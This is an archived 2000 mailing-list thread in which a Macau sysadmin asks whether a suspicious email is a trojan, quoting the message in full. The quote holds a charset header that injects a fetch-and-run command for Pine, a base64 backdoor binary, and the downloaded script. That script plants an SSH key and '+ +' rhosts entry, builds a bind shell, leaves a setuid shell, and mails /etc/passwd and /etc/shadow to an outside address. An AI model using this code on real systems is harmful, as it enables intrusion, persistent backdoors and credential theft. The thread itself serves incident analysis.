Re: Is it a TrajonHorse?
Hi Tang,
Thanks for your information.
It properly is a new virus (found only after 16 May) which is especially
designed for UNIX administrator who like to use PINE as the Email client.
You can find more discussion in the newsgroup... for example,
http://x42.deja.com/getdoc.xp?AN=624410603&search=thread&CONTEXT=958548790.554172430&HIT_CONTEXT=958548790.554172430&HIT_NUM=1&hitnum=0
Best regards,
Voyage
------------------------------------------------------------------------------
Io Hio Hong, Voyage
CI, Centro de Informatica (http://www-ci.ipm.edu.mo)
Macau Polytechnic Institute (http://www.ipm.edu.mo)
Tel: 5996175 Fax: 530505
Email: voyage@ipm.edu.mo ICQ: 4050204
On Wed, 17 May 2000, Tang wrote:
> Hello,
>
> I received an email attention to root with strange contents. The
> whole email is shown for your reference.
> When I read the logs attached with the mail, I don't find anything
> (ip address, dns) relating to our domain.
>
> Then I try to know where is the email from, so I point my browser to
> http://tofan.onza.net. The browser ouputs
> a page of shell scripts and program code! They as also attached at
> the end of this mail. Then I start to scan the
> whole email carefully, and find a line of strange Content-Type
> statement as follows:
>
> Content-Type: TEXT/PLAIN;
> charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
> name="emailf" Content-Transfer-Encoding: BASE64
>
> Looks like to start Lynx to browse the page with the susipous codes,
> then run the code to steal the /etc/passwd
> file!
>
> Seems like my Pine didn't run Lynx automatically..... but not sure
> the harm to us yet!
>
> Do you even receive some email like this? Any comments?
>
> regards,
> Tang.
>
> UMac, INESC Macau
> R.A.
>
>
> ============================== Begining of email
> =============================
> >From root@tofan.onza.net Mon May 15 15:18:55 2000
> Received: from mars.fontijne.nl (smtp.fontijne.nl [195.7.212.130])
> by inesc-macau.org.mo (8.9.2/8.9.2/Debian/GNU) with ESMTP id PAA16075
> for <root@neptune.inesc-macau.org.mo>; Mon, 15 May 2000 15:16:41 +0800
> (CST)
> Received: from Bastion.Fontijne.nl (195.7.212.131 [195.7.212.131]) by
> mars.fontijne.nl with SMTP (Microsoft Exchange Internet Mail Service
> Version 5.5.2650.21)
> id K69W8LSQ; Mon, 15 May 2000 08:55:41 +0200
> Received: from atl-qbu-zpn-vty3.as.wcom.net ([216.192.215.3]) by
> Bastion.Fontijne.nl; Mon, 15 May 2000 08:48:49 +0000 (GMT)
> Message-ID: <Pine.LNX.4.10.9909171428170.28464-100000@tofan.onza.net>
> Date: Sat, 13 May 2000 21:15:05 -0400 (EDT)
> From: root <root@tofan.onza.net>
> Subject: DOS attack, log file attached!
> MIME-Version: 1.0
> To: root@tofan.onza.net
> Content-Type: MULTIPART/MIXED;
> BOUNDARY="-1463811839-1047689522-958180505=:1450"
> Status: RO
> X-Status:
>
> This message is in MIME format. The first part should be readable
> text,
> while the remaining parts are likely unreadable without MIME-aware
> tools.
> Send mail to mime@docserver.cac.washington.edu for more info.
>
> ---1463811839-1047689522-958180505=:1450
> Content-Type: TEXT/PLAIN; charset=US-ASCII
>
> THIS IS TO INFORM YOU THAT A DOS ATTACK WAS LOGGED ON A
> SECURITIES AND EXCHANGE COMMISION INTERNET FIREWALL
> FROM YOUR DOMAIN.
> AN EXCERPT FROM OUR LOGS IS ATTACHED BELOW.
> ALL TIMES ARE US EASTERN AND ARE SYNCED WITH NTP.
>
> Jerry Leininser
> cops@tofan.onza.net
>
> ---2463811839-1047689522-958180505=:1450
> Content-Type: APPLICATION/octet-stream;
> name="log.txt.tofan.onza.net.exit"
> Content-Transfer-Encoding: BASE64
> Content-ID: <Pine.LNX.4.10.1000512211505.1450B@tofan.onza.net>
> Content-Description:
>
> f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAkIYECDQAAABcDAAAAAAAADQAIAAF
> ACgAFwAUAAYAAAA0AAAANIAECDSABAigAAAAoAAAAAUAAAAEAAAAAwAAANQA
> AADUgAQI1IAECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQITQoA
> AE0KAAAFAAAAABAAAAEAAABQCgAAUJoECFCaBAj0AAAA+AAAAAYAAAAAEAAA
> AgAAALwKAAC8mgQIvJoECIgAAACIAAAABgAAAAQAAAAvbGliL2xkLWxpbnV4
> LnNvLjEAABEAAAAfAAAAAAAAABwAAAAWAAAAGgAAABkAAAAAAAAADQAAABEA
> AAATAAAACgAAAAkAAAAYAAAAAQAAABcAAAAOAAAAFAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAUAAAACAAAAAAAAAAcAAAAAAAAA
> CAAAAAAAAAAAAAAACwAAAAAAAAAGAAAAEAAAAAAAAAASAAAAFQAAAB4AAAAd
> AAAAGwAAAAAAAAADAAAADwAAAAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAsA
> AABYhQQIHgAAABIAAAASAAAAaIUECCgAAAAiAAAAGQAAALyaBAgAAAAAEQDx
> /yIAAAB4hQQIfgAAABIAAAAoAAAAiIUECAAAAAAiAAAALQAAAJiFBAheAAAA
> IgAAADQAAABQmgQIBAAAABEADAA+AAAAqIUECDYAAAASAAAARAAAALiFBAhm
> AAAAIgAAAEkAAABAhQQIAAAAABIABwBPAAAAyIUECF4AAAAiAAAAVgAAANiF
> BAhGAAAAEgAAAGIAAABQmgQIBAAAACAADABqAAAA6IUECF4AAAAiAAAAbwAA
> AESbBAgCAAAAEQARAH0AAAD4hQQIVAAAABIAAACEAAAACIYECFYAAAAiAAAA
> iwAAABiGBAgAAAAAIgAAAJAAAACQiQQIAAAAABIACgCWAAAAKIYECDQAAAAS
> AAAAnQAAAGSaBAgAAAAAEQDx/7MAAAA4hgQIDQAAACIAAAC5AAAASIYECIAA
> AAASAAAAvgAAAFiGBAg+AAAAEgAAAMkAAABohgQIwAAAABIAAADQAAAAeIYE
> CAAAAAAiAAAA1gAAAIyJBAgAAAAAEQDx/90AAABEmwQIAAAAABEA8f/kAAAA
> RJsECAAAAAARAPH/8AAAAEibBAgAAAAAEQDx/wBsaWJjLnNvLjUAc3RyY3B5
> AHByaW50ZgBfRFlOQU1JQwBleGVjbABkdXAyAHNvY2tldABfX2Vudmlyb24A
> Ynplcm8Ac2VuZABfaW5pdABhY2NlcHQAX19saWJjX2luaXQAZW52aXJvbgBi
> aW5kAF9fZnB1X2NvbnRyb2wAc2lnbmFsAGxpc3RlbgBmb3JrAF9maW5pAGF0
> ZXhpdABfR0xPQkFMX09GRlNFVF9UQUJMRV8AaHRvbnMAZXhpdABfX3NldGZw
> dWN3AHN0cmxlbgBjbG9zZQBfZXRleHQAX2VkYXRhAF9fYnNzX3N0YXJ0AF9l
> bmQAAAAARJsECAUPAABwmgQIBwEAAHSaBAgHAgAAeJoECAcEAAB8mgQIBwUA
> AICaBAgHBgAAhJoECAcIAACImgQIBwkAAIyaBAgHCwAAkJoECAcMAACUmgQI
> Bw4AAJiaBAgHEAAAnJoECAcRAACgmgQIBxIAAKSaBAgHFAAAqJoECAcWAACs
> mgQIBxcAALCaBAgHGAAAtJoECAcZAAC4mgQIBxoAAAAAAAAAAAAA6CMEAADC
> AAD/NWiaBAj/JWyaBAgAAAAA/yVwmgQIaAAAAADp4P////8ldJoECGgIAAAA
> 6dD/////JXiaBAhoEAAAAOnA/////yV8mgQIaBgAAADpsP////8lgJoECGgg
> AAAA6aD/////JYSaBAhoKAAAAOmQ/////yWImgQIaDAAAADpgP////8ljJoE
> CGg4AAAA6XD/////JZCaBAhoQAAAAOlg/////yWUmgQIaEgAAADpUP////8l
> mJoECGhQAAAA6UD/////JZyaBAhoWAAAAOkw/////yWgmgQIaGAAAADpIP//
> //8lpJoECGhoAAAA6RD/////JaiaBAhocAAAAOkA/////yWsmgQIaHgAAADp
> 8P7///8lsJoECGiAAAAA6eD+////JbSaBAhoiAAAAOnQ/v///yW4mgQIaJAA
> AADpwP7//wAAAAAAAAAAWYnjieCJygHSAdIB0IPABDHtVVVVieVQU1G4iAAA
> ALsAAAAAzYCLRCQIo1CaBAgPtwVEmwQIUOiM////g8QE6AT///9okIkECOhK
> ////g8QE6Fr+///oSQAAAFDoV////1uNtCYAAAAAjbQmAAAAALgBAAAAzYDr
> 9420JgAAAABTu2CaBAiDPWCaBAgAdA2QiwP/0IPDBIM7AHX0W8ONNsOQkJBV
> ieWD7DjHRfyYiQQIx0X4pokECMdF9MyJBAjoxP7//4nAhcB0CmoB6Of+//+D
> xARmx0XYAgBoOTAAAOjE/v//g8QEicBmiUXax0XcAAAAAGoIjUXYjVAIUugW
> /v//g8QIaPeJBAiLRQyLEFLos/3//4PECGoBahHoR/7//4PECGoAagFqAujZ
> /f//g8QMicCJRfCDffAAfRtoDYoECOiR/f//g8QEicBQ6Gb+//+DxASNdgBq
> EI1F2FCLRfBQ6PH9//+DxAyJwIXAfRhoG4oECOhe/f//g8QEicBQ6DP+//+D
> xARqBYtF8FDo5f3//4PECInAhcB9GGgnigQI6DL9//+DxASJwFDoB/7//4PE
> BMdF6BAAAACNRehQjUXIUItF8FDobP3//4PEDInAiUXsg33sAH0aaDWKBAjo
> 9Pz//4PEBInAUOjJ/f//g8QEjTboj/3//4nAhcAPhL0AAABqAItF/FDoyv3/
> /4PEBInAUItF/FCLRexQ6Af9//+DxBBqAItF+FDoqf3//4PEBInAUItF+FCL
> RexQ6Ob8//+DxBBqAItF9FDoiP3//4PEBInAUItF9FCLRexQ6MX8//+DxBBq
> AItF7FDoh/z//4PECGoBi0XsUOh5/P//g8QIagKLRexQ6Gv8//+DxAhqAGhC
> igQIaEWKBAhoRYoECOhC/P//g8QQi0XsUOg2/f//g8QEagDo/Pz//4PEBJCL
> RexQ6B/9//+DxATp6v7//412AMnDkJBTu1SaBAiDPVSaBAj/dA2QiwP/0IPD
> /IM7/3X0W8ONNsOQkJAAAAAA6Hv9///CAAAKQ29ubmVjdGVkIQoKAFRoaXMg
> ZmluZSB0b29sIGNvZGVkIGJ5IEJyb25jIEJ1c3RlcgoAUGxlYXNlIGVudGVy
> IGVhY2ggY29tbWFuZCBmb2xsb3dlZCBieSAnOycKAElfZGlkX25vdF9jaGFu
> Z2VfSElERQBTb2NrZXQgZXJyb3IKAEJpbmQgZXJyb3IKAExpc3RlbiBlcnJv
> cgoAQWNjZXB0IGVycm9yAC1pAC9iaW4vc2gAAAAAAAAAAP////8AAAAA////
> /wAAAAC8mgQIAAAAAAAAAABehQQIboUECH6FBAiOhQQInoUECK6FBAi+hQQI
> zoUECN6FBAjuhQQI/oUECA6GBAgehgQILoYECD6GBAhOhgQIXoYECG6GBAh+
> hgQIAQAAAAEAAAAMAAAAQIUECA0AAACQiQQIBAAAAOiABAgFAAAAoIMECAYA
> AACwgQQICgAAAPUAAAALAAAAEAAAABUAAAAAAAAAAwAAAGSaBAgCAAAAmAAA
> ABQAAAARAAAAFwAAAKCEBAgRAAAAmIQECBIAAAAIAAAAEwAAAAgAAAAAAAAA
> AAAAAABHQ0M6IChHTlUpIDIuNy4yLjEAAEdDQzogKEdOVSkgMi43LjIuMQAA
> R0NDOiAoR05VKSAyLjcuMi4xAAgAAAAAAAAAAQAAADAxLjAxAAAACAAAAAAA
> AAABAAAAMDEuMDEAAAAIAAAAAAAAAAEAAAAwMS4wMQAAAAAuc3ltdGFiAC5z
> dHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALmhhc2gALmR5bnN5bQAuZHluc3Ry
> AC5yZWwuYnNzAC5yZWwucGx0AC5pbml0AC5wbHQALnRleHQALmZpbmkALnJv
> ZGF0YQAuZGF0YQAuY3RvcnMALmR0b3JzAC5nb3QALmR5bmFtaWMALmJzcwAu
> Y29tbWVudAAubm90ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAGwAAAAEAAAACAAAA1IAECNQAAAATAAAAAAAAAAAAAAABAAAA
> AAAAACMAAAAFAAAAAgAAAOiABAjoAAAAyAAAAAMAAAAAAAAABAAAAAQAAAAp
> AAAACwAAAAIAAACwgQQIsAEAAPABAAAEAAAAAQAAAAQAAAAQAAAAMQAAAAMA
> AAACAAAAoIMECKADAAD1AAAAAAAAAAAAAAABAAAAAAAAADkAAAAJAAAAAgAA
> AJiEBAiYBAAACAAAAAMAAAARAAAABAAAAAgAAABCAAAACQAAAAIAAACghAQI
> oAQAAJgAAAADAAAACAAAAAQAAAAIAAAASwAAAAEAAAAGAAAAQIUECEAFAAAI
> AAAAAAAAAAAAAAAQAAAAAAAAAFEAAAABAAAABgAAAEiFBAhIBQAAQAEAAAAA
> dHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALmhhc2gALmR5bnN5bQAuZHluc3Ry
> AC5yZWwuYnNzAC5yZWwucGx0AC5pbml0AC5wbHQALnRleHQALmZpbmkALnJv
> ZGF0YQAuZGF0YQAuY3RvcnMALmR0b3JzAC5nb3QALmR5bmFtaWMALmJzcwAu
> Y29tbWVudAAubm90ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAGwAAAAEAAAACAAAA1IAECNQAAAATAAAAAAAAAAAAAAABAAAA
> AAAAACMAAAAFAAAAAgAAAOiABAjoAAAAyAAAAAMAAAAAAAAABAAAAAQAAAAp
> AAAACwAAAAIAAACwgQQIsAEAAPABAAAEAAAAAQAAAAQAAAAQAAAAMQAAAAMA
> AAACAAAAoIMECKADAAD1AAAAAAAAAAAAAAABAAAAAAAAADkAAAAJAAAAAgAA
> AJiEBAiYBAAACAAAAAMAAAARAAAABAAAAAgAAABCAAAACQAAAAIAAACghAQI
> oAQAAJgAAAADAAAACAAAAAQAAAAIAAAASwAAAAEAAAAGAAAAQIUECEAFAAAI
> AAAAAAAAAAAAAAAQAAAAAAAAAFEAAAABAAAABgAAAEiFBAhIBQAAQAEAAAAA
> AAAAAAAABAAAAAQAAABWAAAAAQAAAAYAAACQhgQIkAYAAPwCAAAAAAAAAAAA
> ABAAAAAAAAAAXAAAAAEAAAAGAAAAkIkECJAJAAAIAAAAAAAAAAAAAAAQAAAA
> AAAAAGIAAAABAAAAAgAAAJiJBAiYCQAAtQAAAAAAAAAAAAAAAQAAAAAAAABq
> AAAAAQAAAAMAAABQmgQIUAoAAAQAAAAAAAAAAAAAAAQAAAAAAAAAcAAAAAEA
> AAADAAAAVJoECFQKAAAIAAAAAAAAAAAAAAAEAAAAAAAAAHcAAAABAAAAAwAA
> AFyaBAhcCgAACAAAAAAAAAAAAAAABAAAAAAAAAB+AAAAAQAAAAMAAABkmgQI
> ZAoAAFgAAAAAAAAAAAAAAAQAAAAEAAAAgwAAAAYAAAADAAAAvJoECLwKAACI
> AAAABAAAAAAAAAAEAAAACAAAAIwAAAAIAAAAAwAAAESbBAhECwAABAAAAAAA
> AAAAAAAABAAAAAAAAACRAAAAAQAAAAAAAAAAAAAARAsAADwAAAAAAAAAAAAA
> AAEAAAAAAAAAmgAAAAcAAAAAAAAAPAAAAIALAAA8AAAAAAAAAAAAAAABAAAA
> AAAAABEAAAADAAAAAAAAAAAAAAC8CwAAoAAAAAAAAAAAAAAAAQAAAAAAAAAB
> AAAAAgAAAAAAAAssssssssssssssssssssssKQAAAAQAAAAQAAAACQAAAAMA
> AAAAAAAAAAAAAJQUAAC+AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAADAAEAAAAAAAAAAAAAAAAAAwACAAAAAAAAAAAA
> AAAAAAMAAwAAAAAAAAAAAAAAAAADAAQAAAAAAAAAAAAAAAAAAwAFAAAAAAAA
> AAAAAAAAAAMABgAAAAAAAAAAAAAAAAADAAcAAAAAAAAAAAAAAAAAAwAIAAAA
> AAAAAAAAAAAAAAMACQAAAAAAAAAAAAAAAAADAAoAAAAAAAAAAAAAAAAAAwAL
> AAAAAAAAAAAAAAAAAAMADAAAAAAAAAAAAAAAAAADAA0AAAAAAAAAAAAAAAAA
> AwAOAAAAAAAAAAAAAAAAAAMADwAAAAAAAAAAAAAAAAADABAAAAAAAAAAAAAA
> AAAAAwARAAAAAAAAAAAAAAAAAAMAEgAAAAAAAAAAAAAAAAADABMAAAAAAAAA
> AAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAAAAAAAAADABYAAQAA
> AAAAAAAAAAAABADx/wwAAABoiQQIAAAAAAAACQAbAAAAaIkECAAAAAACAAkA
> MQAAAFiaBAgAAAAAAQANAD4AAACIiQQIAAAAAAIACQBJAAAAVJoECAAAAAAB
> AAwAVwAAAGCaBAgAAAAAAQAOAGQAAAAAAAAAAAAAAAQA8f9rAAAAAIcECAAA
> AAAAAAkAAQAAAAAAAAAAAAAABADx/wwAAAAQhwQIAAAAAAAACQBwAAAAEIcE
> CAAAAAACAAkAhgAAAFyaBAgAAAAAAQAOAJQAAAAwhwQIAAAAAAIACQBJAAAA
> VJoECAAAAAABAAwAnwAAAFSaBAgAAAAAAQANAK0AAAAAAAAAAAAAAAQA8f8M
> AAAANIcECAAAAAAAAAkAuQAAAFiFBAgeAAAAEgAAAMAAAABohQQIKAAAACIA
> AADHAAAAvJoECAAAAAARAPH/0AAAAIyJBAgAAAAAEQDx/9cAAAB4hQQIfgAA
> ABIAAADdAAAAiIUECAAAAAAiAAAA4gAAAJiFBAheAAAAIgAAAOkAAABQmgQI
> BAAAABEADADzAAAAqIUECDYAAAASAAAA+QAAALiFBAhmAAAAIgAAAP4AAABA
> hQQIAAAAABIABwAEAQAAyIUECF4AAAAiAAAACwEAANiFBAhGAAAAEgAAABcB
> AABQmgQIBAAAACAADAAfAQAA6IUECF4AAAAiAAAAJAEAAESbBAgCAAAAEQAR
> ADIBAACQhgQIgAAAABIACQA5AQAA+IUECFQAAAASAAAAQAEAAJCGBAgAAAAA
> EAAJAE8BAAAIhgQIVgAAACIAAABWAQAAGIYECAAAAAAiAAAAWwEAAESbBAgA
> AAAAEQDx/2cBAAA0hwQIMgIAABIACQBsAQAAkIkECAAAAAASAAoAcgEAACiG
> BAg0AAAAEgAAAHkBAABEmwQIAAAAABEA8f+AAQAAZJoECAAAAAARAPH/lgEA
> AEibBAgAAAAAEQDx/5sBAAA4hgQIDQAAACIAAAChAQAASIYECIAAAAASAAAA
> pgEAAFiGBAg+AAAAEgAAALEBAABohgQIwAAAABIAAAC4AQAAeIYECAAAAAAi
> AAAAAGNydHN0dWZmLmMAZ2NjMl9jb21waWxlZC4AX19kb19nbG9iYWxfY3Rv
> cnNfYXV4AF9fQ1RPUl9FTkRfXwBpbml0X2R1bW15AGZvcmNlX3RvX2RhdGEA
> X19EVE9SX0VORF9fAGNydDAuUwBkb25lAF9fZG9fZ2xvYmFsX2R0b3JzX2F1
> eABfX0RUT1JfTElTVF9fAGZpbmlfZHVtbXkAX19DVE9SX0xJU1RfXwBibGFj
> a2hvbGUuYwBzdHJjcHkAcHJpbnRmAF9EWU5BTUlDAF9ldGV4dABleGVjbABk
> dXAyAHNvY2tldABfX2Vudmlyb24AYnplcm8Ac2VuZABfaW5pdABhY2NlcHQA
> X19saWJjX2luaXQAZW52aXJvbgBiaW5kAF9fZnB1X2NvbnRyb2wAX3N0YXJ0
> AHNpZ25hbABfX19jcnRfZHVtbXlfXwBsaXN0ZW4AZm9yawBfX2Jzc19zdGFy
> dABtYWluAF9maW5pAGF0ZXhpdABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFC
> TEVfAF9lbmQAaHRvbnMAZXhpdABfX3NldGZwdWN3AHN0cmxlbgBjbG9zZQA=
> ---2463811839-1047689522-958180505=:1450--
> ---1463811839-1047689522-958180505=:1450
> Content-Type: TEXT/PLAIN;
> charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
> name="emailf" Content-Transfer-Encoding: BASE64
> Content-Description: THE LOGS
> Content-Disposition: attachment; filename="emailf"
>
>
>
>
>
>
>
>
> PLEASE FORGIVE US IF YOUR SYSTEM WAS ERRORNEOUSLY ACUSED,
> WE HAVE FACED A KERNEL PANIC!
>
> Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
> 206.121.213.44:8080 L=60 S=0x00 I=63749 F=0x0040 T=55
> .S....
> Sep 16 17:29:24 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
> 206.121.213.44:8080 L=60 S=0x00 I=63928 F=0x0040 T=55
> .S....
> Sep 16 17:29:30 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
> 206.121.213.44:8080 L=60 S=0x00 I=64281 F=0x0040 T=55
> .S....
> Sep 16 17:29:42 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
> 206.121.213.44:8080 L=60 S=0x00 I=64978 F=0x0040 T=55
> .S....
> Sep 16 17:29:45 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1389 \
> 206.121.213.44:8080 L=60 S=0x00 I=65097 F=0x0040 T=55
> .S....
> Sep 16 17:29:48 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1389 \
> 206.121.213.44:8080 L=60 S=0x00 I=65205 F=0x0040 T=55
> .S....
> Sep 16 17:29:54 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1389 \
> 206.121.213.44:8080 L=60 S=0x00 I=22 F=0x0040 T=55 .S....
> Sep 16 17:30:05 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1412 \
> 206.121.213.44:8080 L=60 S=0x00 I=775 F=0x0040 T=55 .S....
>
> Sep 16 17:30:06 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
> 206.121.213.44:8080 L=60 S=0x00 I=787 F=0x0040 T=55 .S....
>
> Sep 16 17:30:11 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1412 \
> 206.121.213.44:8080 L=60 S=0x00 I=1014 F=0x0040 T=55
> .S....
> Sep 16 17:30:21 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1423 \
> 206.121.213.44:8080 L=60 S=0x00 I=1438 F=0x0040 T=55
> .S....
>
>
> ---1463811839-1047689522-958180505=:1450--
>
> ================================ End of email
> ==============================
>
>
>
>
> ============================== Source of web page
> ==============================
> grep "x4334@AGRI" ~/.ssh/authorized_keys >/dev/null 2>&1 || if [ 0 ];
> then
> if [ ! -d ~/.ssh ]
> then umask 022 >/dev/null 2>&1;mkdir ~/.ssh >/dev/null 2>&1
> echo "+ +" >> ~/.rhosts 2>/dev/null
> fi
> umask 022 >/dev/null 2>&1
> echo "512 35
> 9785877609308338986917478061014184970982460312434529051173539551539508793288925026879592531038110506684705572154197270221242712482140435531967239855453591
> x4334@AGRI" >> ~/.ssh/authorized_keys 2>/dev/null
> cat << __EOF__ > /tmp/io.c
> #define PORT 56789
> #include <stdio.h>
> #include <signal.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
>
> int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
> struct sockaddr_in serv_addr;
> struct sockaddr_in client_addr;
>
> int main (int argc, char **argv)
> {
>
> soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
> if (soc_des == -1)
> exit(-1);
> bzero((char *) &serv_addr, sizeof(serv_addr));
> strcpy(argv[0],"updated");
> serv_addr.sin_family = AF_INET;
> serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
> serv_addr.sin_port = htons(PORT);
> soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr,
> sizeof(serv_addr));
> if (soc_rc != 0)
> exit(-1);
> if (fork() != 0)
> exit(0);
> setpgrp();
> signal(SIGHUP, SIG_IGN);
> if (fork() != 0)
> exit(0);
> soc_rc = listen(soc_des, 5);
> if (soc_rc != 0)
> exit(0);
> while (1) {
> soc_len = sizeof(client_addr);
> soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,
> &soc_len);
> if (soc_cli < 0)
> exit(0);
> cli_pid = getpid();
> server_pid = fork();
> if (server_pid != 0) {
> dup2(soc_cli,0);
> dup2(soc_cli,1);
> dup2(soc_cli,2);
> execl("/bin/sh","sh", "-i",(char *)0);
> close(soc_cli);
> exit(0);
> }
> close(soc_cli);
> }
> }
> __EOF__
> gcc -o /tmp/io /tmp/io.c >/dev/null 2>&1
> /tmp/io >/dev/null 2>&1 ||mkdir /tmp/.pkoss493 >/dev/null 2>&1&&cp
> /bin/sh /tmp/.pkoss493/.rc >/dev/null 2>&1;chmod 4715 /tmp/.pkoss493/.rc
> >/dev/null 2>&1
> rm -rf /tmp/io.c
> rm -rf /tmp/io
> mail -s hhp000 bjern3@attglobal.net >/dev/null 2>&1 < /etc/passwd
> echo "`hostname -i 2>&1` - `id 2>&1`- `uname -a 2>&1`- `ls -al ~
> 2>&1` - `cat /etc/shadow 2>&1`" | mail -s hhp001 bjern3@attglobal.net
> 2>/dev/null
> chmod og-w ~ >/dev/null 2>&1
> chmod og-w ~/.ssh >/dev/null 2>&1
> fi
> ============================== End of source of web page
> ==========================
>
>
Reply to: